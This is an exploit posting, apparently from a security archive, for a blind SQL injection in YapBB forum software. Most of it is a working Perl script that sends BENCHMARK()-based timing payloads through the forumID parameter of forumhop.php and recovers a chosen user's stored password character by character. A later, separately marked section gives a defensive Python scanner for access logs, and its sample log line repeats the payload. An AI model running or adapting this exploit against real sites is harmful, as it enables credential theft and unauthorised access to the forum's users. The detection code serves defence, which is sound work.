
YapBB 1.2 Blind SQL Injection

YapBB 1.2 Blind SQL Injection
Posted Feb 4, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

YapBB versions 1.2 and below remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 4f1c5776d73f7cba4a9de65aac18bd8f9ac08ec74e969296c6cffe6991b5cedd

--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage
{
    die "\nYapBB <= 1.2 Blind SQL Injection Exploit".
        "\n[?] Author : darkjoker".
        "\n[?] Site : http://darkjoker.net23.net".
        "\n[?] CMS Site: http://yapbb.sourceforge.net/".
        "\n[?] Usage : perl ${0} <hostname> <path> <username> [<key_list>]".
        "\n[?] Ex. : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
        "\n\n";
}

# Build the injected forumID value: when the character at position $pos of
# the target user's stored password equals $chr, BENCHMARK() stalls the query.
sub query
{
    my ($user, $chr, $pos) = @_;
    my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
        "forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
    $query =~ s/ /%20/g;
    $query =~ s/'/%27/g;
    return $query;
}

# Send one probe; the response time is the only oracle used.
sub exploit
{
    my ($hostname, $path, $user, $chr, $pos) = @_;
    $chr = ord ($chr);
    my $sock = new IO::Socket::INET (
        PeerHost => $hostname,
        PeerPort => 80,
        Proto => "tcp"
    ) or die "\n[!] Exploit failed.\n\n";

    my $query = query ($user, $chr, $pos);
    my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1\r\n".
        "Host: ${hostname}\r\n".
        "Connection: Close\r\n\r\n";

    my $start = time ();
    print $sock $request;
    1 while (<$sock>);    # drain the response; its content is irrelevant
    my $elapsed = time () - $start;
    close ($sock);

    return 1 if ($elapsed > 4);
    return 0;
}

my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr = 0;
my $pos = 1;
my $password = "";
# Try each candidate character at the current position; on a hit, append it
# and advance to the next position. The loop ends when no candidate matches.
while ($chr < scalar (@key))
{
    if (exploit ($hostname, $path, $user, $key [$chr], $pos))
    {
        $password .= $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
    {
        $chr++;
    }
}

print "\n[+] Password: ${password}\n\n";
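A defender-side counterpart, added here and not part of darkjoker's exploit or of YapBB: a small Python scanner that flags the traces this technique leaves in web server access logs (a BENCHMARK()-style timing function in a query parameter, a non-numeric forumID, and an abnormally slow response to such a request). The log lines are constructed, and the trailing request-time field is an assumed log layout.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined log format plus a trailing request-time field in seconds (as nginx
# $request_time would give); that trailing field is an assumed layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<secs>[\d.]+)$'
)
# Functions whose only purpose inside a URL parameter is to stall the database.
TIMING_FUNCS = re.compile(r'\b(BENCHMARK|SLEEP|PG_SLEEP|WAITFOR\s+DELAY)\s*\(', re.I)
# Parameters the application treats as integers (forumID in forumhop.php).
INT_PARAMS = {"forumID"}

def analyse_line(line, slow_threshold=4.0):
    """Return (finding, detail) tuples for one access-log line; [] if benign."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # parse_qs percent-decodes the values, so %20/%27 become space and quote.
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if TIMING_FUNCS.search(value):
                findings.append(("timing_function", name))
            elif name in INT_PARAMS and not value.isdigit():
                findings.append(("non_integer_param", name))
    # A slow response to a suspicious request corroborates a timing oracle.
    if findings and float(m.group("secs")) >= slow_threshold:
        findings.append(("slow_response", m.group("ip")))
    return findings

def suspicious_clients(lines):
    """Count flagged requests per client IP; a blind SQLi run shows many hits."""
    per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and analyse_line(line):
            per_ip[m.group("ip")] += 1
    return per_ip

# Constructed sample: one normal request, then two probes from a second client.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Feb/2009:10:00:01 +0000] "GET /YapBB/forumhop.php?action=next&forumID=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012',
    '198.51.100.9 - - [04/Feb/2009:10:00:02 +0000] "GET /YapBB/forumhop.php?action=next&forumID=123%20OR%20IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20forum_user%20WHERE%20nickname%20=%20%27root%27),1,1))=97),BENCHMARK(200000000,CHAR(0)),0) HTTP/1.1" 200 512 "-" "-" 7.831',
    '198.51.100.9 - - [04/Feb/2009:10:00:10 +0000] "GET /YapBB/forumhop.php?action=next&forumID=123%20OR%201=1 HTTP/1.1" 200 512 "-" "-" 0.015',
]
```

For the second sample line, analyse_line returns [('timing_function', 'forumID'), ('slow_response', '198.51.100.9')], and suspicious_clients(SAMPLE_LOG) attributes both probes to 198.51.100.9.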
